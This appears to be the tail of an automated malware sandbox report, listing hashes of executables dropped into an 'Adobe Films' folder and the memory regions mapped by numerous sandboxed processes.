SHA19bbb1cefd052ae602354f3f4b5a2484f31b06f37
SHA2563a77893efb476ec95d3e340cf5b98f1bf39c77a4064be7c39475ef9ebd3aed1c
SHA5124dba92ebc85d5553a11b749fa8147f233c1ab7cd04256d3fd1fed17126cc338a93fa64f1ec807d3eb75f6958a5555c8f9078c0b8ed7c090278a03e7fbe06eb06
-
C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exeMD5
42b723af993da6045a5a1b2d9a45e41d
SHA151c2f4b6531d6a44e5e909b3c20e27c46d674b19
SHA2562e662c7bc7c28596116b25028e7207722d9a609a0d634677ecc7a9ec5d5b878c
SHA51208fbe522b3c81742efdac92ac166791d762e10224c49ee5232797871aad4013a8af77e6ea215a13b5bdc30fc4ec9c9103d726db8cfe890ce6307cc8fc734c715
-
C:\Users\Admin\Pictures\Adobe Films\UqjuQ1dgHGsSiPLUpbp52GVy.exeMD5
42b723af993da6045a5a1b2d9a45e41d
SHA151c2f4b6531d6a44e5e909b3c20e27c46d674b19
SHA2562e662c7bc7c28596116b25028e7207722d9a609a0d634677ecc7a9ec5d5b878c
SHA51208fbe522b3c81742efdac92ac166791d762e10224c49ee5232797871aad4013a8af77e6ea215a13b5bdc30fc4ec9c9103d726db8cfe890ce6307cc8fc734c715
-
C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exeMD5
3f22bd82ee1b38f439e6354c60126d6d
SHA163b57d818f86ea64ebc8566faeb0c977839defde
SHA256265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
-
C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exeMD5
76bd7bbd17a648e9633e065ab58a1093
SHA1c0904208f97d7d5aab44980264731ee7ef86c112
SHA256ed8083e0afe640b1e0da90be2200e007949a94af58f6ad07d0cb50131cad2e2f
SHA512b1862ccf6ac35e66b3fffb4aa438b42bce4b23125f856c47135998ac4b169f7e41724e31959997bbcf8f1b13f640741b02e3c8ca5dca8ecbe371770a349a47f2
-
C:\Users\Admin\Pictures\Adobe Films\hrhEFdag2pQKmAwA8AOXAH5Z.exeMD5
76bd7bbd17a648e9633e065ab58a1093
SHA1c0904208f97d7d5aab44980264731ee7ef86c112
SHA256ed8083e0afe640b1e0da90be2200e007949a94af58f6ad07d0cb50131cad2e2f
SHA512b1862ccf6ac35e66b3fffb4aa438b42bce4b23125f856c47135998ac4b169f7e41724e31959997bbcf8f1b13f640741b02e3c8ca5dca8ecbe371770a349a47f2
-
C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exeMD5
24d65bc71073ab165736d1a983844c51
SHA1b9b89c1a5ba9c96c8763730a3e553274b11b26f1
SHA256fd620e37a051958418cb2a741b772f5bbcc283a47627b195fd0cd608cbd7e663
SHA512bb1a3a53e47d6fcf7de9e0d710bdf48877876c73f4a41e951acdc5717673718073b20971e2093770b88211156163937a1dcc977c74337a21783690aa6aedcc8d
-
C:\Users\Admin\Pictures\Adobe Films\iZ4M1J96Sntem8227kHDdgjJ.exeMD5
24d65bc71073ab165736d1a983844c51
SHA1b9b89c1a5ba9c96c8763730a3e553274b11b26f1
SHA256fd620e37a051958418cb2a741b772f5bbcc283a47627b195fd0cd608cbd7e663
SHA512bb1a3a53e47d6fcf7de9e0d710bdf48877876c73f4a41e951acdc5717673718073b20971e2093770b88211156163937a1dcc977c74337a21783690aa6aedcc8d
-
C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exeMD5
80dfcce79746fa5f6d6586963f2d0ea6
SHA1082c49491efda190daed58b44188bed03dcc78bf
SHA256cdc00a4d60058abdd666ddb7a283bf5eb57a668c08656e757f0faa5bf7d5007b
SHA512fbd9c0fddca8754e1df6f16a4966046b2a9e16ade6aeec9f5917699d47d755f1915cfd73ce3a0168b812708f081c47a5245d4b013032fa7613be5d7b4be64907
-
C:\Users\Admin\Pictures\Adobe Films\koWWz0CDL9D_1Drwoq08LvCC.exeMD5
80dfcce79746fa5f6d6586963f2d0ea6
SHA1082c49491efda190daed58b44188bed03dcc78bf
SHA256cdc00a4d60058abdd666ddb7a283bf5eb57a668c08656e757f0faa5bf7d5007b
SHA512fbd9c0fddca8754e1df6f16a4966046b2a9e16ade6aeec9f5917699d47d755f1915cfd73ce3a0168b812708f081c47a5245d4b013032fa7613be5d7b4be64907
-
C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exeMD5
4c1cb3eb362b3eedb2889084943f4c88
SHA149209c4e0017e4ac045ee7c7d74d392e9d6d92d0
SHA2569da261b424c3556a10381504bce49fd981fb77451d96bd8f08316941954255fc
SHA51273a02d55ed6b226afbbe529d7eaa5c4fe5ca2c30dfb02bc0d7c8160d6e925ababb58127e065c5e83bb59c4d888663517e843e2950141fcc959f50ae46b47e05c
-
C:\Users\Admin\Pictures\Adobe Films\vB85CLYRioIwOWyvE81XtmUq.exeMD5
4c1cb3eb362b3eedb2889084943f4c88
SHA149209c4e0017e4ac045ee7c7d74d392e9d6d92d0
SHA2569da261b424c3556a10381504bce49fd981fb77451d96bd8f08316941954255fc
SHA51273a02d55ed6b226afbbe529d7eaa5c4fe5ca2c30dfb02bc0d7c8160d6e925ababb58127e065c5e83bb59c4d888663517e843e2950141fcc959f50ae46b47e05c
-
C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exeMD5
19b0bf2bb132231de9dd08f8761c5998
SHA1a08a73f6fa211061d6defc14bc8fec6ada2166c4
SHA256ef2a03f03f9748effd79d71d7684347792f9748b7bbb18843bd382570e4d332e
SHA5125bbf211c2b0500903e07e8b460cae5e6085a14bdf2940221502d123bd448fa01dd14518cfef03a967f10b0edbd5778b5deb7141d4c6c168fc1e34aba9f96ffa1
-
C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exeMD5
19b0bf2bb132231de9dd08f8761c5998
SHA1a08a73f6fa211061d6defc14bc8fec6ada2166c4
SHA256ef2a03f03f9748effd79d71d7684347792f9748b7bbb18843bd382570e4d332e
SHA5125bbf211c2b0500903e07e8b460cae5e6085a14bdf2940221502d123bd448fa01dd14518cfef03a967f10b0edbd5778b5deb7141d4c6c168fc1e34aba9f96ffa1
-
memory/488-184-0x0000000000640000-0x0000000000650000-memory.dmpFilesize
64KB
-
memory/488-167-0x0000000000000000-mapping.dmp
-
memory/488-193-0x0000000000780000-0x0000000000792000-memory.dmpFilesize
72KB
-
memory/764-603-0x0000000001130000-0x0000000001132000-memory.dmpFilesize
8KB
-
memory/912-448-0x0000000000000000-mapping.dmp
-
memory/1080-153-0x0000000000000000-mapping.dmp
-
memory/1180-214-0x0000000000000000-mapping.dmp
-
memory/1244-188-0x000000000081D000-0x0000000000839000-memory.dmpFilesize
112KB
-
memory/1244-154-0x0000000000000000-mapping.dmp
-
memory/1244-301-0x0000000002350000-0x000000000237F000-memory.dmpFilesize
188KB
-
memory/1264-290-0x0000000000000000-mapping.dmp
-
memory/1284-196-0x0000000000000000-mapping.dmp
-
memory/1424-235-0x0000000000000000-mapping.dmp
-
memory/1508-155-0x0000000000000000-mapping.dmp
-
memory/1508-455-0x0000000140000000-0x0000000140B88000-memory.dmpFilesize
11.5MB
-
memory/1508-197-0x0000000140000000-0x0000000140B88000-memory.dmpFilesize
11.5MB
-
memory/1508-194-0x0000000140000000-0x0000000140B88000-memory.dmpFilesize
11.5MB
-
memory/1508-189-0x0000000140000000-0x0000000140B88000-memory.dmpFilesize
11.5MB
-
memory/1516-201-0x0000000000000000-mapping.dmp
-
memory/1552-159-0x0000000000000000-mapping.dmp
-
memory/1552-432-0x0000000004CD0000-0x0000000004DA6000-memory.dmpFilesize
856KB
-
memory/1552-175-0x000000000317C000-0x00000000031F8000-memory.dmpFilesize
496KB
-
memory/1564-158-0x0000000000000000-mapping.dmp
-
memory/1572-157-0x0000000000000000-mapping.dmp
-
memory/1744-161-0x0000000000000000-mapping.dmp
-
memory/1744-309-0x0000000004B50000-0x0000000004BDE000-memory.dmpFilesize
568KB
-
memory/1744-187-0x0000000003018000-0x0000000003067000-memory.dmpFilesize
316KB
-
memory/1788-296-0x0000000001600000-0x0000000001601000-memory.dmpFilesize
4KB
-
memory/1788-306-0x0000000002E20000-0x0000000002E21000-memory.dmpFilesize
4KB
-
memory/1788-304-0x0000000002DC0000-0x0000000002E09000-memory.dmpFilesize
292KB
-
memory/1788-272-0x0000000000000000-mapping.dmp
-
memory/1788-338-0x0000000008230000-0x0000000008231000-memory.dmpFilesize
4KB
-
memory/1788-311-0x0000000005600000-0x0000000005601000-memory.dmpFilesize
4KB
-
memory/1788-291-0x0000000000BA0000-0x0000000000BA1000-memory.dmpFilesize
4KB
-
memory/1788-330-0x0000000008190000-0x0000000008191000-memory.dmpFilesize
4KB
-
memory/1788-310-0x00000000085E0000-0x00000000085E1000-memory.dmpFilesize
4KB
-
memory/1872-150-0x0000000000000000-mapping.dmp
-
memory/1920-225-0x00000000014E0000-0x00000000014E1000-memory.dmpFilesize
4KB
-
memory/1920-230-0x0000000005380000-0x0000000005381000-memory.dmpFilesize
4KB
-
memory/1920-237-0x0000000005400000-0x0000000005401000-memory.dmpFilesize
4KB
-
memory/1920-198-0x0000000000000000-mapping.dmp
-
memory/1920-211-0x0000000000A20000-0x0000000000A21000-memory.dmpFilesize
4KB
-
memory/1920-233-0x0000000009D20000-0x0000000009D21000-memory.dmpFilesize
4KB
-
memory/1936-243-0x0000000000000000-mapping.dmp
-
memory/2032-168-0x0000000000000000-mapping.dmp
-
memory/2032-261-0x0000000000A70000-0x0000000000A71000-memory.dmpFilesize
4KB
-
memory/2032-276-0x0000000006090000-0x0000000006091000-memory.dmpFilesize
4KB
-
memory/2104-549-0x00000000049A0000-0x00000000049A1000-memory.dmpFilesize
4KB
-
memory/2108-341-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/2108-289-0x0000000000000000-mapping.dmp
-
memory/2108-361-0x0000000005540000-0x0000000005541000-memory.dmpFilesize
4KB
-
memory/2672-298-0x0000000000000000-mapping.dmp
-
memory/2856-326-0x000001E8270A0000-0x000001E8270A2000-memory.dmpFilesize
8KB
-
memory/2856-332-0x000001E8287F0000-0x000001E8287F1000-memory.dmpFilesize
4KB
-
memory/2856-322-0x000001E8270A0000-0x000001E8270A2000-memory.dmpFilesize
8KB
-
memory/2856-336-0x000001E841320000-0x000001E841321000-memory.dmpFilesize
4KB
-
memory/2856-339-0x000001E828873000-0x000001E828875000-memory.dmpFilesize
8KB
-
memory/2856-324-0x000001E8270A0000-0x000001E8270A2000-memory.dmpFilesize
8KB
-
memory/2856-328-0x000001E8270A0000-0x000001E8270A2000-memory.dmpFilesize
8KB
-
memory/2856-537-0x000001E828878000-0x000001E82887A000-memory.dmpFilesize
8KB
-
memory/2856-312-0x0000000000000000-mapping.dmp
-
memory/2856-334-0x000001E828870000-0x000001E828872000-memory.dmpFilesize
8KB
-
memory/2856-411-0x000001E828876000-0x000001E828878000-memory.dmpFilesize
8KB
-
memory/2996-280-0x0000000000000000-mapping.dmp
-
memory/3028-666-0x00000000013E5000-0x00000000013E6000-memory.dmpFilesize
4KB
-
memory/3028-647-0x00000000013E6000-0x00000000013E7000-memory.dmpFilesize
4KB
-
memory/3028-639-0x00000000013E4000-0x00000000013E5000-memory.dmpFilesize
4KB
-
memory/3028-608-0x00000000013E0000-0x00000000013E2000-memory.dmpFilesize
8KB
-
memory/3036-212-0x0000000002E58000-0x0000000002E7B000-memory.dmpFilesize
140KB
-
memory/3036-160-0x0000000000000000-mapping.dmp
-
memory/3036-673-0x0000000004AD0000-0x0000000004AE3000-memory.dmpFilesize
76KB
-
memory/3036-316-0x0000000004A90000-0x0000000004AC0000-memory.dmpFilesize
192KB
-
memory/3132-164-0x0000000000000000-mapping.dmp
-
memory/3152-283-0x0000000000000000-mapping.dmp
-
memory/3208-460-0x0000000002D50000-0x0000000002D66000-memory.dmpFilesize
88KB
-
memory/3208-661-0x0000000004660000-0x0000000004676000-memory.dmpFilesize
88KB
-
memory/3256-284-0x0000000000000000-mapping.dmp
-
memory/3256-209-0x0000000000000000-mapping.dmp
-
memory/3488-429-0x0000000004BD0000-0x0000000004BD9000-memory.dmpFilesize
36KB
-
memory/3488-192-0x000000000324C000-0x0000000003255000-memory.dmpFilesize
36KB
-
memory/3488-179-0x0000000000000000-mapping.dmp
-
memory/3500-588-0x0000000005D80000-0x0000000005D81000-memory.dmpFilesize
4KB
-
memory/3516-297-0x0000000000000000-mapping.dmp
-
memory/3564-553-0x0000000005C10000-0x0000000005C11000-memory.dmpFilesize
4KB
-
memory/3708-305-0x0000000000000000-mapping.dmp
-
memory/3736-223-0x0000000000000000-mapping.dmp
-
memory/3736-232-0x00000000029E0000-0x00000000029F0000-memory.dmpFilesize
64KB
-
memory/3736-236-0x0000000002A00000-0x0000000002A12000-memory.dmpFilesize
72KB
-
memory/3848-300-0x0000000000000000-mapping.dmp
-
memory/3848-565-0x0000000005B90000-0x0000000005B91000-memory.dmpFilesize
4KB
-
memory/3900-149-0x0000000005A20000-0x0000000005B65000-memory.dmpFilesize
1.3MB
-
memory/3992-294-0x0000000000000000-mapping.dmp
-
memory/4116-249-0x0000000000000000-mapping.dmp
-
memory/4212-148-0x000001B4034F0000-0x000001B4034F4000-memory.dmpFilesize
16KB
-
memory/4212-146-0x000001B400E70000-0x000001B400E80000-memory.dmpFilesize
64KB
-
memory/4212-147-0x000001B400EF0000-0x000001B400F00000-memory.dmpFilesize
64KB
-
memory/4292-323-0x0000000005650000-0x0000000005651000-memory.dmpFilesize
4KB
-
memory/4292-321-0x0000000002E90000-0x0000000002E91000-memory.dmpFilesize
4KB
-
memory/4292-317-0x0000000000D00000-0x0000000000D01000-memory.dmpFilesize
4KB
-
memory/4292-307-0x0000000000000000-mapping.dmp
-
memory/4308-295-0x0000000005C70000-0x0000000005DB5000-memory.dmpFilesize
1.3MB
-
memory/4308-279-0x0000000000000000-mapping.dmp
-
memory/4540-247-0x000000001AF80000-0x000000001AF82000-memory.dmpFilesize
8KB
-
memory/4540-217-0x0000000000000000-mapping.dmp
-
memory/4540-228-0x0000000000190000-0x0000000000191000-memory.dmpFilesize
4KB
-
memory/4668-679-0x0000000000960000-0x0000000000969000-memory.dmpFilesize
36KB
-
memory/4672-437-0x0000000005840000-0x0000000005841000-memory.dmpFilesize
4KB
-
memory/4672-325-0x0000000000000000-mapping.dmp
-
memory/4752-262-0x0000000006100000-0x0000000006101000-memory.dmpFilesize
4KB
-
memory/4752-256-0x0000000005E30000-0x0000000005E31000-memory.dmpFilesize
4KB
-
memory/4752-253-0x0000000005900000-0x0000000005901000-memory.dmpFilesize
4KB
-
memory/4752-254-0x0000000005930000-0x0000000005931000-memory.dmpFilesize
4KB
-
memory/4752-169-0x0000000000000000-mapping.dmp
-
memory/4752-252-0x0000000006450000-0x0000000006451000-memory.dmpFilesize
4KB
-
memory/4752-244-0x00000000006C0000-0x00000000006C1000-memory.dmpFilesize
4KB
-
memory/4752-269-0x0000000005FA0000-0x0000000005FA1000-memory.dmpFilesize
4KB
-
memory/4752-259-0x0000000005990000-0x0000000005991000-memory.dmpFilesize
4KB
-
memory/4752-255-0x0000000005A60000-0x0000000005A61000-memory.dmpFilesize
4KB
-
memory/4796-229-0x0000000000000000-mapping.dmp
-
memory/4848-327-0x0000000000000000-mapping.dmp
-
memory/4980-207-0x0000000000000000-mapping.dmp
-
memory/4992-533-0x000002DA1F5E2000-0x000002DA1F5E4000-memory.dmpFilesize
8KB
-
memory/4992-551-0x000002DA1F5E4000-0x000002DA1F5E5000-memory.dmpFilesize
4KB
-
memory/4992-473-0x000002DA1F5E0000-0x000002DA1F5E2000-memory.dmpFilesize
8KB
-
memory/4992-315-0x0000000000000000-mapping.dmp
-
memory/4992-319-0x000002DA04B90000-0x000002DA04B91000-memory.dmpFilesize
4KB
-
memory/5008-464-0x0000000002270000-0x0000000002271000-memory.dmpFilesize
4KB
-
memory/5008-445-0x0000000000000000-mapping.dmp
-
memory/5132-417-0x0000000000000000-mapping.dmp
-
memory/5144-337-0x0000000000000000-mapping.dmp
-
memory/5204-433-0x0000000000000000-mapping.dmp
-
memory/5204-439-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/5228-344-0x0000000000000000-mapping.dmp
-
memory/5328-516-0x0000000004C20000-0x0000000004C69000-memory.dmpFilesize
292KB
-
memory/5328-346-0x0000000000000000-mapping.dmp
-
memory/5332-658-0x0000000005BA0000-0x0000000005BA1000-memory.dmpFilesize
4KB
-
memory/5352-348-0x0000000000000000-mapping.dmp
-
memory/5352-405-0x0000000005520000-0x0000000005521000-memory.dmpFilesize
4KB
-
memory/5376-357-0x0000000000000000-mapping.dmp
-
memory/5444-352-0x0000000000000000-mapping.dmp
-
memory/5476-423-0x0000027ED1770000-0x0000027ED18D1000-memory.dmpFilesize
1.4MB
-
memory/5476-420-0x0000027ED1910000-0x0000027ED1A6B000-memory.dmpFilesize
1.4MB
-
memory/5476-355-0x0000000000000000-mapping.dmp
-
memory/5572-542-0x000001CBB2AB0000-0x000001CBB2AB2000-memory.dmpFilesize
8KB
-
memory/5572-670-0x000001CBB2AB8000-0x000001CBB2ABA000-memory.dmpFilesize
8KB
-
memory/5572-546-0x000001CBB2AB3000-0x000001CBB2AB5000-memory.dmpFilesize
8KB
-
memory/5572-600-0x000001CBB2AB6000-0x000001CBB2AB8000-memory.dmpFilesize
8KB
-
memory/5672-363-0x0000000000000000-mapping.dmp
-
memory/5700-364-0x0000000000000000-mapping.dmp
-
memory/5700-375-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/5708-434-0x0000000000C80000-0x0000000000C82000-memory.dmpFilesize
8KB
-
memory/5708-425-0x0000000000000000-mapping.dmp
-
memory/5712-513-0x0000000002FE0000-0x0000000002FE9000-memory.dmpFilesize
36KB
-
memory/5712-365-0x0000000000000000-mapping.dmp
-
memory/5764-489-0x0000000004DF0000-0x0000000004DF1000-memory.dmpFilesize
4KB
-
memory/5768-370-0x0000000000000000-mapping.dmp
-
memory/5800-372-0x0000000000000000-mapping.dmp
-
memory/5924-388-0x0000000000000000-mapping.dmp
-
memory/5976-579-0x0000000005530000-0x0000000005531000-memory.dmpFilesize
4KB
-
memory/6020-623-0x00000000015D2000-0x00000000015D4000-memory.dmpFilesize
8KB
-
memory/6020-631-0x00000000015D4000-0x00000000015D5000-memory.dmpFilesize
4KB
-
memory/6020-636-0x00000000015D5000-0x00000000015D6000-memory.dmpFilesize
4KB
-
memory/6020-602-0x00000000015D0000-0x00000000015D2000-memory.dmpFilesize
8KB
-
memory/6020-458-0x0000000000000000-mapping.dmp
-
memory/6028-386-0x0000000000000000-mapping.dmp
-
memory/6028-402-0x00000000007A0000-0x00000000007A1000-memory.dmpFilesize
4KB
-
memory/6080-389-0x0000000000000000-mapping.dmp
-
memory/6080-408-0x0000000005020000-0x0000000005021000-memory.dmpFilesize
4KB
-
memory/7492-686-0x0000000002EF0000-0x0000000002F64000-memory.dmpFilesize
464KB